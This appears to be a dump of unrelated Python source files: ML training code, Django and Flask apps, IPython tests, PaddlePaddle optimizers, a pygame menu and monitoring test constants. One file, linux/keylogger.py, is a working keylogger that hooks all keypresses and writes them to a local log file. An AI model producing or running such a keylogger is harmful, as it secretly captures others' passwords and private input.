a node in layer -> row in weight matrix input_v = self.layers[layer].inputs[0][weight] #Get input to current weight #Calculate update for each weight for given node weight_delta = self.layers[layer].deltas[node] * input_v self.layers[layer].weights[weight][node] += self.learning_rate * weight_delta return error def Train(self, epochs, cases, validation_percent=10.0, validation_interval=100, print_interval=100): self.training_cases = cases np.random.shuffle(self.training_cases) #Add bias of -1 to each case for c in range(len(self.training_cases)): self.training_cases[c][0][0].append(-1.0) #Use a certain percentage of training cases as validation set self.validation_cases = self.training_cases[:int(len(self.training_cases) * (validation_percent / 100.0))] #Perform initial validation to see where we start from self.Validate() #Perform training for epoch in range(1, epochs+1): epoch_error = 0.0 for case in self.training_cases: self.FeedForward(case[0]) epoch_error += self.BackpropagationMultiLayer(case[1]) self.errors.append(epoch_error / len(self.training_cases)) if epoch % print_interval == 0: print("Epoch:", epoch) if epoch % validation_interval == 0: print("Epoch:", epoch) self.Validate() def Validate(self): self.Test(self.validation_cases, add_bias=False) def Test(self, cases=[], add_bias=True, few_cases=False): if len(cases) > 0 and add_bias: #Test cases NOT are the same as training cases for c in range(len(cases)): cases[c][0][0].append(-1.0) else: cases = self.training_cases #Use training cases as test cases correct_classifications = 0 for case in cases: self.FeedForward(case[0]) #Print detailed info about each calssification attempt if few_cases: print() print("Case:") print("Input:", case[0][0][:-1]) #Remove bias from print print("Target:", case[1]) print("Output: ", np.round(self.layers[self.output_layer].outputs[0][:-1]), " \n\t(raw: ", self.layers[self.output_layer].outputs[0][:-1], ")", sep='') #Remember to remov ebias term from output for ease of readability if self.layer_sizes[self.output_layer] > 1: #One hot vector winner_index = np.argmax(self.layers[self.output_layer].outputs[0][:-1]) if case[1][winner_index] == 1: correct_classifications += 1 else: if np.round(self.layers[self.output_layer].outputs[0][:-1]) == case[1]: correct_classifications += 1 print("Accuracy: ", float(correct_classifications) / len(cases) * 100.0, "%", sep='') def PlotError(self): x = np.arange(0, len(self.errors)) y = self.errors plt.xlabel('Epoch') plt.ylabel('Squared Error') plt.plot(x, y) plt.show()<filename>src/rozbieznosci_dyscyplin/models.py from django.db import models from django.db.models import DO_NOTHING from bpp.fields import YearField from bpp.models import BazaModeluOdpowiedzialnosciAutorow, TupleField class RozbieznosciViewBase(models.Model): id = TupleField(models.IntegerField(), size=3, primary_key=True) rekord = models.ForeignKey("bpp.Rekord", DO_NOTHING, related_name="+") rok = YearField() autor = models.ForeignKey("bpp.Autor", DO_NOTHING, related_name="+") dyscyplina_rekordu = models.ForeignKey( "bpp.Dyscyplina_Naukowa", DO_NOTHING, related_name="+", null=True, blank=True ) dyscyplina_autora = models.ForeignKey( "bpp.Dyscyplina_Naukowa", DO_NOTHING, related_name="+" ) subdyscyplina_autora = models.ForeignKey( "bpp.Dyscyplina_Naukowa", DO_NOTHING, related_name="+", null=True, blank=True ) class Meta: managed = False abstract = True class BrakPrzypisaniaView(RozbieznosciViewBase): class Meta: managed = False class RozbieznePrzypisaniaView(RozbieznosciViewBase): class Meta: managed = 
False


class RozbieznosciView(RozbieznosciViewBase):
    # Note: if a publication has one and the same author in more than one role
    # (e.g. both as editor and as author), this model and the
    # get_wydawnictwo_autor_obj function will fail.

    class Meta:
        managed = False
        verbose_name = "rozbieżność rekordu i dyscyplin"
        verbose_name_plural = "rozbieżności rekordów i dyscyplin"

    def get_wydawnictwo_autor_obj(self) -> BazaModeluOdpowiedzialnosciAutorow:
        # Note: if a publication has one and the same author in more than one
        # role (e.g. both as editor and as author), this model and this function
        # will fail (it returns only the first record linking the author to the
        # publication).
        return self.rekord.original.autorzy_set.filter(autor=self.autor).first()
<gh_stars>1-10
from __future__ import absolute_import, division, print_function  # makes code Python 2 and 3 compatible mostly

import hashlib
import logging

log = logging.getLogger(__name__)  # the original used an undefined `log`


def get_file_md5(filename):
    with open(filename, 'rb') as f:  # binary mode: hashers require bytes
        chunk_size = 1024
        hasher = hashlib.md5()
        while True:
            try:
                data = f.read(chunk_size)
            except IOError as e:
                # The original message referenced undefined names `path` and `agent`.
                log.error('error hashing %s' % filename)
                return {'error': '%s' % e}
            if not data:
                break
            hasher.update(data)
    return hasher


def get_file_sha1(filename):
    with open(filename, 'rb') as f:
        chunk_size = 1024
        hasher = hashlib.sha1()
        while True:
            try:
                data = f.read(chunk_size)
            except IOError as e:
                log.error('error hashing %s' % filename)
                return {'error': '%s' % e}
            if not data:
                break
            hasher.update(data)
    return hasher


def get_file_md5_and_sha1(filename):
    with open(filename, 'rb') as f:
        chunk_size = 1024
        hasher = hashlib.md5()
        hasher_sha = hashlib.sha1()
        while True:
            try:
                data = f.read(chunk_size)
            except IOError as e:
                log.error('error hashing %s' % filename)
                return {'error': '%s' % e}
            if not data:
                break
            hasher.update(data)
            hasher_sha.update(data)
    return (hasher.hexdigest(), hasher_sha.hexdigest())
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import shutil
import sys
import tempfile

from observations.r.prestige import prestige


def test_prestige():
  """Test module prestige.py by downloading
  prestige.csv and testing shape of
  extracted data has 102 rows and 6 columns
  """
  test_path = tempfile.mkdtemp()
  x_train, metadata = prestige(test_path)
  try:
    assert x_train.shape == (102, 6)
  except:
    shutil.rmtree(test_path)
    raise
# encoding: utf-8
"""Tests for IPython.utils.capture"""

#-----------------------------------------------------------------------------
#  Copyright (C) 2013 The IPython Development Team
#
#  Distributed under the terms of the BSD License. The full license is in
#  the file COPYING, distributed as part of this software.
#----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Imports #----------------------------------------------------------------------------- import sys import pytest from IPython.utils import capture #----------------------------------------------------------------------------- # Globals #----------------------------------------------------------------------------- _mime_map = dict( _repr_png_="image/png", _repr_jpeg_="image/jpeg", _repr_svg_="image/svg+xml", _repr_html_="text/html", _repr_json_="application/json", _repr_javascript_="application/javascript", ) basic_data = { 'image/png' : b'binarydata', 'text/html' : "<b>bold</b>", } basic_metadata = { 'image/png' : { 'width' : 10, 'height' : 20, }, } full_data = { 'image/png' : b'binarydata', 'image/jpeg' : b'binarydata', 'image/svg+xml' : "<svg>", 'text/html' : "<b>bold</b>", 'application/javascript' : "alert();", 'application/json' : "{}", } full_metadata = { 'image/png' : {"png" : "exists"}, 'image/jpeg' : {"jpeg" : "exists"}, 'image/svg+xml' : {"svg" : "exists"}, 'text/html' : {"html" : "exists"}, 'application/javascript' : {"js" : "exists"}, 'application/json' : {"json" : "exists"}, } hello_stdout = "hello, stdout" hello_stderr = "hello, stderr" #----------------------------------------------------------------------------- # Test Functions #----------------------------------------------------------------------------- @pytest.mark.parametrize("method_mime", _mime_map.items()) def test_rich_output_empty(method_mime): """RichOutput with no args""" rich = capture.RichOutput() method, mime = method_mime assert getattr(rich, method)() is None def test_rich_output(): """test RichOutput basics""" data = basic_data metadata = basic_metadata rich = capture.RichOutput(data=data, metadata=metadata) assert rich._repr_html_() == data["text/html"] assert rich._repr_png_() == (data["image/png"], metadata["image/png"]) assert rich._repr_latex_() is None assert rich._repr_javascript_() is None assert rich._repr_svg_() is None @pytest.mark.parametrize("method_mime", _mime_map.items()) def test_rich_output_no_metadata(method_mime): """test RichOutput with no metadata""" data = full_data rich = capture.RichOutput(data=data) method, mime = method_mime assert getattr(rich, method)() == data[mime] @pytest.mark.parametrize("method_mime", _mime_map.items()) def test_rich_output_metadata(method_mime): """test RichOutput with metadata""" data = full_data metadata = full_metadata rich = capture.RichOutput(data=data, metadata=metadata) method, mime = method_mime assert getattr(rich, method)() == (data[mime], metadata[mime]) def test_rich_output_display(): """test RichOutput.display This is a bit circular, because we are actually using the capture code we are testing to test itself. 
""" data = full_data rich = capture.RichOutput(data=data) with capture.capture_output() as cap: rich.display() assert len(cap.outputs) == 1 rich2 = cap.outputs[0] assert rich2.data == rich.data assert rich2.metadata == rich.metadata def test_capture_output(): """capture_output works""" rich = capture.RichOutput(data=full_data) with capture.capture_output() as cap: print(hello_stdout, end="") print(hello_stderr, end="", file=sys.stderr) rich.display() assert hello_stdout == cap.stdout assert hello_stderr == cap.stderr def test_capture_output_no_stdout(): """test capture_output(stdout=False)""" rich = capture.RichOutput(data=full_data) with capture.capture_output(stdout=False) as cap: print(hello_stdout, end="") print(hello_stderr, end="", file=sys.stderr) rich.display() assert "" == cap.stdout assert hello_stderr == cap.stderr assert len(cap.outputs) == 1 def test_capture_output_no_stderr(): """test capture_output(stderr=False)""" rich = capture.RichOutput(data=full_data) # add nested capture_output so stderr doesn't make it to nose output with capture.capture_output(), capture.capture_output(stderr=False) as cap: print(hello_stdout, end="") print(hello_stderr, end="", file=sys.stderr) rich.display() assert hello_stdout == cap.stdout assert "" == cap.stderr assert len(cap.outputs) == 1 def test_capture_output_no_display(): """test capture_output(display=False)""" rich = capture.RichOutput(data=full_data) with capture.capture_output(display=False) as cap: print(hello_stdout, end="") print(hello_stderr, end="", file=sys.stderr) rich.display() assert hello_stdout == cap.stdout assert hello_stderr == cap.stderr assert cap.outputs == [] # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import paddle.trainer_config_helpers.config_parser_utils as config_parser_utils import paddle.trainer_config_helpers.optimizers as v1_optimizers from paddle.proto.OptimizerConfig_pb2 import OptimizerConfig __all__ = [ 'Momentum', 'Adam', 'Adamax', 'AdaGrad', 'DecayedAdaGrad', 'AdaDelta', 'RMSProp', 'ModelAverage', 'L2Regularization' ] class Optimizer(object): def __init__(self, **kwargs): import py_paddle.swig_paddle as swig_api if 'batch_size' in kwargs: del kwargs['batch_size'] # not important for python library. def __impl__(): v1_optimizers.settings(batch_size=1, **kwargs) self.__opt_conf_proto__ = config_parser_utils.parse_optimizer_config( __impl__) self.__opt_conf__ = swig_api.OptimizationConfig.createFromProto( self.__opt_conf_proto__) def enable_types(self): """ get enable_types for each optimizer. enable_types = [value, gradient, momentum, etc] For each optimizer(SGD, Adam), GradientMachine should enable different buffers. 
""" import py_paddle.swig_paddle as swig_api tmp = swig_api.ParameterOptimizer.create(self.__opt_conf__) assert isinstance(tmp, swig_api.ParameterOptimizer) return tmp.getParameterTypes() def __create_local_updater__(self): import py_paddle.swig_paddle as swig_api return swig_api.ParameterUpdater.createLocalUpdater(self.__opt_conf__) def __create_remote_updater__(self, pass_num, use_sparse_updater): import py_paddle.swig_paddle as swig_api return swig_api.ParameterUpdater.createRemoteUpdater( self.__opt_conf__, pass_num, use_sparse_updater) def __create_new_remote_updater__(self, pserver_spec, use_etcd): import py_paddle.swig_paddle as swig_api return swig_api.ParameterUpdater.createNewRemoteUpdater( self.__opt_conf__, pserver_spec, use_etcd) def create_updater(self, is_local, num_passes, use_sparse_updater, pserver_spec, use_etcd): """ create proper parameter_updater by configuration. :param is_local: create local or remote parameter updater :param num_passes: remote parameter updater will use this to config parameter server. :param use_sparse_updater: when use remote updater, if some parameter is sparse, updater should do some extra thing: .. code-block:: python if use_sparse_remote_updater: gradient_machine.prefetch(in_args) parameter_updater.getParametersRemote() :param pserver_spec: pserver location, eg: localhost:3000, if use etcd, pserver_spec should be the etcd endpoints, eg: http://localhost:2379 :return: parameter_updater """ if is_local: parameter_updater = self.__create_local_updater__() else: if pserver_spec is None: parameter_updater = self.__create_remote_updater__( num_passes, use_sparse_updater) else: parameter_updater = self.__create_new_remote_updater__( pserver_spec, use_etcd) return parameter_updater class Momentum(Optimizer): """ Momentum Optimizer. When sparse=False, the momentum update formula is as follows: .. math:: v_{t} &= k * v_{t-1} - \\gamma_t (g_{t} + \\lambda w_{t-1}) \\\\ w_{t} &= w_{t-1} + v_{t} \\\\ where, :math:`k` is momentum, :math:`\\lambda` is decay rate, :math:`\\gamma_t` is learning rate at the t'th iteration. :math:`w_{t}` is the weight as the t'th iteration. And the :math:`v_{t}` is the history momentum variable. When sparse=True, the update scheme: .. math:: \\alpha_t &= \\alpha_{t-1} / k \\\\ \\beta_t &= \\beta_{t-1} / (1 + \\lambda \\gamma_t) \\\\ u_t &= u_{t-1} - \\alpha_t \\gamma_t g_t \\\\ v_t &= v_{t-1} + \\tau_{t-1} \\alpha_t \\gamma_t g_t \\\\ \\tau_t &= \\tau_{t-1} + \\beta_t / \\alpha_t where :math:`k` is momentum, :math:`\\lambda` is decay rate, :math:`\\gamma_t` is learning rate at the t'th iteration. :param momentum: the momentum factor. :type momentum: float :param sparse: with sparse support or not, False by default. :type sparse: bool """ def __init__(self, momentum=None, sparse=False, **kwargs): learning_method = v1_optimizers.MomentumOptimizer( momentum=momentum, sparse=sparse) super(Momentum, self).__init__( learning_method=learning_method, **kwargs) class Adam(Optimizer): """ Adam optimizer. The details of please refer `Adam: A Method for Stochastic Optimization <https://arxiv.org/abs/1412.6980>`_ .. math:: m(w, t) & = \\beta_1 m(w, t-1) + (1 - \\beta_1) \\nabla Q_i(w) \\\\ v(w, t) & = \\beta_2 v(w, t-1) + (1 - \\beta_2)(\\nabla Q_i(w)) ^2 \\\\ w & = w - \\frac{\\eta m(w, t)}{\\sqrt{v(w,t) + \\epsilon}} :param beta1: the :math:`\\beta_1` in equation. :type beta1: float :param beta2: the :math:`\\beta_2` in equation. :type beta2: float :param epsilon: the :math:`\\epsilon` in equation. It is used to prevent divided by zero. 
:type epsilon: float """ def __init__(self, beta1=0.9, beta2=0.999, epsilon=1e-8, **kwargs): learning_method = v1_optimizers.AdamOptimizer( beta1=beta1, beta2=beta2, epsilon=epsilon) super(Adam, self).__init__(learning_method=learning_method, **kwargs) class Adamax(Optimizer): """ Adamax optimizer. The details of please refer this `Adam: A Method for Stochastic Optimization <https://arxiv.org/abs/1412.6980>`_ .. math:: m_t & = \\beta_1 * m_{t-1} + (1-\\beta_1)* \\nabla Q_i(w) \\\\ u_t & = max(\\beta_2*u_{t-1}, abs(\\nabla Q_i(w))) \\\\ w_t & = w_{t-1} - (\\eta/(1-\\beta_1^t))*m_t/u_t :param beta1: the :math:`\\beta_1` in the equation. :type beta1: float :param beta2: the :math:`\\beta_2` in the equation. :type beta2: float """ def __init__(self, beta1=0.9, beta2=0.999, **kwargs): learning_method = v1_optimizers.AdamaxOptimizer( beta1=beta1, beta2=beta2) super(Adamax, self).__init__(learning_method=learning_method, **kwargs) class AdaGrad(Optimizer): """ Adagrad(for ADAptive GRAdient algorithm) optimizer. For details please refer this `Adaptive Subgradient Methods for Online Learning and Stochastic Optimization <http://www.magicbroom.info/Papers/DuchiHaSi10.pdf>`_. .. math:: G &= \\sum_{\\tau=1}^{t} g_{\\tau} g_{\\tau}^T \\\\ w & = w - \\eta diag(G)^{-\\frac{1}{2}} \\circ g """ def __init__(self, **kwargs): learning_method = v1_optimizers.AdaGradOptimizer() super(AdaGrad, self).__init__(learning_method=learning_method, **kwargs) class DecayedAdaGrad(Optimizer): """ AdaGrad method with decayed sum gradients. The equations of this method show as follow. .. math:: E(g_t^2) &= \\rho * E(g_{t-1}^2) + (1-\\rho) * g^2 \\\\ learning\\_rate &= 1/sqrt( ( E(g_t^2) + \\epsilon ) :param rho: The :math:`\\rho` parameter in that equation :type rho: float :param epsilon: The :math:`\\epsilon` parameter in that equation. :type epsilon: float """ def __init__(self, rho=0.95, epsilon=1e-06, **kwargs): learning_method = v1_optimizers.DecayedAdaGradOptimizer( rho=rho, epsilon=epsilon) super(DecayedAdaGrad, self).__init__( learning_method=learning_method, **kwargs) class AdaDelta(Optimizer): """ AdaDelta method. The details of adadelta please refer to this `ADADELTA: AN ADAPTIVE LEARNING RATE METHOD <http://www.matthewzeiler.com/pubs/googleTR2012/googleTR2012.pdf>`_. .. math:: E(g_t^2) &= \\rho * E(g_{t-1}^2) + (1-\\rho) * g^2 \\\\ learning\\_rate &= sqrt( ( E(dx_{t-1}^2) + \\epsilon ) / ( \\ E(g_t^2) + \\epsilon ) ) \\\\ E(dx_t^2) &= \\rho * E(dx_{t-1}^2) + (1-\\rho) * (-g*learning\\_rate)^2 :param rho: :math:`\\rho` in equation :type rho: float :param epsilon: :math:`\\rho` in equation :type epsilon: float """ def __init__(self, rho=0.95, epsilon=1e-06, **kwargs): learning_method = v1_optimizers.AdaDeltaOptimizer( rho=rho, epsilon=epsilon) super(AdaDelta, self).__init__( learning_method=learning_method, **kwargs) class RMSProp(Optimizer): """ RMSProp(for Root Mean Square Propagation) optimizer. For details please refer this `slide <http://www.cs.toronto.edu/~tijmen/csc321/slides/ lecture_slides_lec6.pdf>`_. The equations of this method as follows: .. math:: v(w, t) & = \\rho v(w, t-1) + (1 - \\rho)(\\nabla Q_{i}(w))^2 \\\\ w & = w - \\frac{\\eta} {\\sqrt{v(w,t) + \\epsilon}} \\nabla Q_{i}(w) :param rho: the :math:`\\rho` in the equation. The forgetting factor. :type rho: float :param epsilon: the :math:`\\epsilon` in the equation. 
:type epsilon: float """ def __init__(self, rho=0.95, epsilon=1e-6, **kwargs): learning_method = v1_optimizers.RMSPropOptimizer( rho=rho, epsilon=epsilon) super(RMSProp, self).__init__(learning_method=learning_method, **kwargs) ModelAverage = v1_optimizers.ModelAverage L2Regularization = v1_optimizers.L2Regularization if __name__ == '__main__': import py_paddle.swig_paddle as swig_api swig_api.initPaddle('--use_gpu=false') for opt in [ Momentum(), Adam(), Adamax(), AdaGrad(), DecayedAdaGrad(), AdaDelta(), RMSProp(), Adam( model_average=ModelAverage(average_window=0.5), regularization=L2Regularization(rate=0.5), gradient_clipping_threshold=25) ]: print opt, opt.enable_types() <filename>api/__init__.py<gh_stars>0 from flask import Flask, request, jsonify, render_template from flask_restful import Resource, Api, reqparse from flask_cors import CORS, cross_origin from sklearn.externals import joblib import json app = Flask(__name__) api = Api(app) CORS(app) def prediction(): predictor = joblib.load('models/json_data') return predictor class Clients(Resource): def get(self): data = prediction() return json.loads(data) @app.route('/') @cross_origin() def root(): return render_template("index.html") api.add_resource(Clients, '/clients')<reponame>amjcode/Keylogger<filename>linux/keylogger.py #!/usr/bin/env python import os import pyxhook # This tells the keylogger where the log file will go. # You can set the file path as an environment variable ('pylogger_file'), # or use the default ~/Desktop/file.log log_file = os.environ.get( 'pylogger_file', os.path.expanduser('~/Desktop/file.log') ) # Allow setting the cancel key from environment args, Default: ` cancel_key = ord( os.environ.get( 'pylogger_cancel', '`' )[0] ) # Allow clearing the log file on start, if pylogger_clean is defined. if os.environ.get('pylogger_clean', None) is not None: try: os.remove(log_file) except EnvironmentError: # File does not exist, or no permissions. pass def OnKeyPress(event): with open(log_file, 'a') as f: f.write('{}\n'.format(event.Key)) if event.Ascii == cancel_key: new_hook.cancel() new_hook = pyxhook.HookManager() new_hook.KeyDown = OnKeyPress new_hook.HookKeyboard() try: new_hook.start() except KeyboardInterrupt: # User cancelled from command line. pass except Exception as ex: # Write exceptions to the log file, for analysis later. 
msg = 'Error while catching events:\n {}'.format(ex) pyxhook.print_err(msg) with open(log_file, 'a') as f: f.write('\n{}'.format(msg)) import logging from allauth.account import views as allauth_views from django.urls import reverse_lazy logger = logging.getLogger(__name__) class MySignupView(allauth_views.SignupView): template_name = "register.html" success_url = reverse_lazy("profile:edit") class MyLoginView(allauth_views.LoginView): template_name = "login.html" success_url = reverse_lazy("profile:edit") class MyEmailView(allauth_views.EmailView): template_name = "email.html" # success_url = reverse_lazy("profile:edit") class MyConfirmEmailView(allauth_views.ConfirmEmailView): success_url = reverse_lazy("profile:edit") class MyPasswordChangeView(allauth_views.PasswordChangeView): template_name = "password_change.html" success_url = reverse_lazy("profile:edit") class MyPasswordSetView(allauth_views.PasswordSetView): template_name = "password_set.html" success_url = reverse_lazy("core:home-page") class MyPasswordResetView(allauth_views.PasswordResetView): template_name = "password_reset.html" # success_url = reverse_lazy("account_login") class MyPasswordResetDoneView(allauth_views.PasswordResetDoneView): template_name = "password_reset_done.html" class MyPasswordResetFromKeyView(allauth_views.PasswordResetFromKeyView): template_name = "password_reset_from_key.html" # success_url = reverse_lazy("profile:edit") class MyPasswordResetFromKeyDoneView(allauth_views.PasswordResetFromKeyDoneView): template_name = "password_reset_from_key_done.html" from django.db import models # Create your models here. class WeatherForecastDay(models.Model): country_code = models.CharField(max_length=8) for_day = models.DateField() average_temp_c = models.DecimalField(max_digits=5, decimal_places=2) # created_at = models.DateTimeField(auto_now_add=True class Meta: unique_together = ('country_code', 'for_day',) def __str__(self): return f'{self.country_code} {self.for_day}'<reponame>Kunalmighty/BlueJaysGame<filename>volume.py<gh_stars>0 """ #EmbraceTheS's options menu state. 
""" import state import options import globes as G import pygame import soundwave import game import enemy import player import items class Volume(state.State): """ Volume menu state with the option to change volume """ BACKGROUND = None NOTCH = None STEP = 0.1 def __init__(self, sound=False): state.State.__init__(self) if not sound: G.play_music("title.ogg") if (Volume.BACKGROUND is None): self.build_bg() Volume.NOTCH = pygame.image.load("bg/notch.png")\ .convert_alpha() self.option = True # True for volume, False for brightness def render(self): G.Globals.SCREEN.blit(Volume.BACKGROUND, (0, 0)) G.Globals.SCREEN.blit(Volume.NOTCH, (537 + 200 * G.Globals.VOLUME, 233)) G.Globals.SCREEN.blit(Volume.NOTCH, (537 + 200 * G.Globals.BRIGHTNESS, 313)) def update(self, time): pass def event(self, event): if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: G.Globals.STATE = options.Options(True) elif event.key == pygame.K_UP or event.key == pygame.K_DOWN: self.option = not self.option elif event.key == pygame.K_LEFT: if self.option: self.change_volume(-Volume.STEP) else: self.change_brightness(-Volume.STEP) elif event.key == pygame.K_RIGHT: if self.option: self.change_volume(Volume.STEP) else: self.change_brightness(Volume.STEP) def build_bg(self): # G.Globals.FONT is size 30 font = pygame.font.Font(None, 35) Volume.BACKGROUND = pygame.image.load("bg/titlescreen.png")\ .convert() surf = pygame.image.load("bg/bar.png").convert_alpha() Volume.BACKGROUND.blit(surf, (532, 230)) Volume.BACKGROUND.blit(surf, (532, 310)) surf = font.render("Brightness", True, G.BLACK) Volume.BACKGROUND.blit(surf, (532, 280)) surf = font.render("Volume", True, G.BLACK) Volume.BACKGROUND.blit(surf, (532, 165)) surf = G.Globals.FONT.render("Hit 'm' to mute/unmute", True, G.BLACK) Volume.BACKGROUND.blit(surf, (532, 200)) def change_volume(self, change): if ((change < 0 and G.Globals.VOLUME <= 0) or (change > 0 and G.Globals.VOLUME >= 1)): return G.Globals.VOLUME += change set_volume_levels() def change_brightness(self, change): if ((change < 0 and G.Globals.BRIGHTNESS <= 0) or (change > 0 and G.Globals.BRIGHTNESS >= 1)): return G.Globals.BRIGHTNESS += change pygame.display.set_gamma(G.Globals.BRIGHTNESS, G.Globals.BRIGHTNESS, G.Globals.BRIGHTNESS) def set_volume_levels(): if G.Globals.MUTE: level = 0 else: level = G.Globals.VOLUME G.Globals.SOUND.set_volume(level) if soundwave.Soundwave.SOUND is not None: soundwave.Soundwave.SOUND.set_volume(level) if game.Game.ENEMY_BOUNCE is not None: game.Game.ENEMY_BOUNCE.set_volume(level) if game.Game.EVIL_LAUGH is not None: game.Game.EVIL_LAUGH.set_volume(level) if player.Player.WALLSOUND is not None: player.Player.WALLSOUND.set_volume(level) if items.Airplane.SOUND is not None: items.Airplane.SOUND.set_volume(level) # items.Twain.SOUND.set_volume(level) """ AWSConnector setup """ from setuptools import setup if __name__ == "__main__": setup( name="AWSConnector", include_package_data=True, data_files=[ ( "etc/jupyter/jupyter_server_config.d", ["jupyter-config/jupyter_server_config.d/AWSConnector.json"] ), ] ) # (C) Datadog, Inc. 
2018-present # All rights reserved # Licensed under a 3-clause BSD style license (see LICENSE) import os from packaging import version from datadog_checks.dev import get_docker_hostname PORT = '8500' HOST = get_docker_hostname() URL = 'http://{}:{}'.format(HOST, PORT) CHECK_NAME = 'consul' HERE = os.path.dirname(os.path.abspath(__file__)) CONSUL_VERSION = os.getenv('CONSUL_VERSION') PROMETHEUS_ENDPOINT_AVAILABLE = version.parse(CONSUL_VERSION) > version.parse('1.1.0') # Not all the metrics are exposed in this test environment. # raft.replication.installSnapshot and raft.replication.appendEntries.logs are not tested # since our testing environment does not easily expose them. PROMETHEUS_METRICS = [ 'consul.client.rpc', 'consul.memberlist.msg.alive', 'consul.memberlist.tcp.accept', 'consul.memberlist.tcp.connect', 'consul.memberlist.tcp.sent', 'consul.memberlist.udp.received', 'consul.memberlist.udp.sent', 'consul.raft.state.candidate', 'consul.raft.state.leader', 'consul.serf.events', 'consul.serf.member.join', 'consul.serf.member.update', ] PROMETHEUS_METRICS_1_9 = ['consul.client.rpc.failed', 'consul.raft.leader.lastContact.count'] PROMETHEUS_HIST_METRICS = [ 'consul.memberlist.gossip.', 'consul.memberlist.probenode.', 'consul.memberlist.probenode.', 'consul.memberlist.pushpullnode.', 'consul.raft.commitTime.', 'consul.raft.leader.dispatchLog.', 'consul.runtime.gc_pause_ns.', 'consul.serf.coordinate.adjustment_ms.', 'consul.serf.msgs.sent.', 'consul.serf.msgs.received.', ] PROMETHEUS_HIST_METRICS_1_9 = [ 'consul.raft.replication.appendEntries.rpc.', 'consul.raft.replication.heartbeat.', ] # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'ui/table_dialog.ui' # # Created by: PyQt5 UI code generator 5.15.4 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_tableDialog(object): def setupUi(self, tableDialog): tableDialog.setObjectName("tableDialog") tableDialog.resize(400, 290) tableDialog.setMaximumSize(QtCore.QSize(400, 300)) tableDialog.setSizeGripEnabled(False) tableDialog.setModal(False) self.buttonBox = QtWidgets.QDialogButtonBox(tableDialog) self.buttonBox.setGeometry(QtCore.QRect(30, 240, 341, 32)) self.buttonBox.setOrientation(QtCore.Qt.Horizontal) self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok) self.buttonBox.setObjectName("buttonBox") self.retranslateUi(tableDialog) self.buttonBox.accepted.connect(tableDialog.accept) self.buttonBox.rejected.connect(tableDialog.reject) QtCore.QMetaObject.connectSlotsByName(tableDialog) def retranslateUi(self, tableDialog): _translate = QtCore.QCoreApplication.translate tableDialog.setWindowTitle(_translate("tableDialog", "Table Options")) <filename>gran_dag/data.py # coding=utf-8 """ GraN-DAG Copyright © 2019 Authors of Gradient-Based Neural DAG Learning Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import os import numpy as np import torch class DataManagerFile(object): def __init__(self, file_path, i_dataset, train_samples=0.8, test_samples=None, train=True, normalize=False, mean=None, std=None, random_seed=42): """ Parameters: ----------- train_samples: uint or float, default=0.8 If float, specifies the proportion of data used for training and the rest is used for testing. If an integer, specifies the exact number of examples to use for training. test_samples: uint, default=None Specifies the number of examples to use for testing. The default value uses all examples that are not used for training. """ self.random = np.random.RandomState(random_seed) # Load the graph adjacency = np.load(os.path.join(file_path, "DAG{}.npy".format(i_dataset))) self.adjacency = torch.as_tensor(adjacency).type(torch.Tensor) # Load data self.data_path = os.path.join(file_path, "data{}.npy".format(i_dataset)) data = np.load(self.data_path) # Determine train/test partitioning if isinstance(train_samples, float): train_samples = int(data.shape[0] * train_samples) if test_samples is None: test_samples = data.shape[0] - train_samples assert train_samples + test_samples <= data.shape[0], "The number of examples to load must be smaller than " + \ "the total size of the dataset" # Shuffle and filter examples shuffle_idx = np.arange(data.shape[0]) self.random.shuffle(shuffle_idx) data = data[shuffle_idx[: train_samples + test_samples]] # Train/test split if not train: if train_samples == data.shape[0]: # i.e. no test set self.dataset = None else: self.dataset = torch.as_tensor(data[train_samples: train_samples + test_samples]).type(torch.Tensor) else: self.dataset = torch.as_tensor(data[: train_samples]).type(torch.Tensor) # Normalize data self.mean, self.std = mean, std if normalize: if self.mean is None or self.std is None: self.mean = torch.mean(self.dataset, 0, keepdim=True) self.std = torch.std(self.dataset, 0, keepdim=True) self.dataset = (self.dataset - self.mean) / self.std self.num_samples = self.dataset.size(0) def sample(self, batch_size): sample_idxs = self.random.choice(np.arange(int(self.num_samples)), size=(int(batch_size),), replace=False) samples = self.dataset[torch.as_tensor(sample_idxs).long()] return samples, torch.ones_like(samples) # second output is mask (for intervention in the future) <gh_stars>0 """Convert representations for cmlkit""" import numpy as np def to_local(data, rep): """Convert dscribe-style atomic rep to cmlkit-style atomic rep. dscribe returns local descriptors as one flat array of dimension n_total_atoms x dim, whereas cmlkit expects a ndarray-list of length n_systems, where each entry is an ndarry of dim n_atoms_system x dim, i.e. the local representations for each atom in this particular system. The translation between these two notations is done via an offset array, which keeps track of which entries in the dscribe array belong to which atom. 
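As an illustration (values assumed for clarity, not taken from a real dataset): with per-system atom counts of [2, 3], the offsets are [0, 2, 5], so rows 0-1 of `rep` become the first system's block and rows 2-4 the second's.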
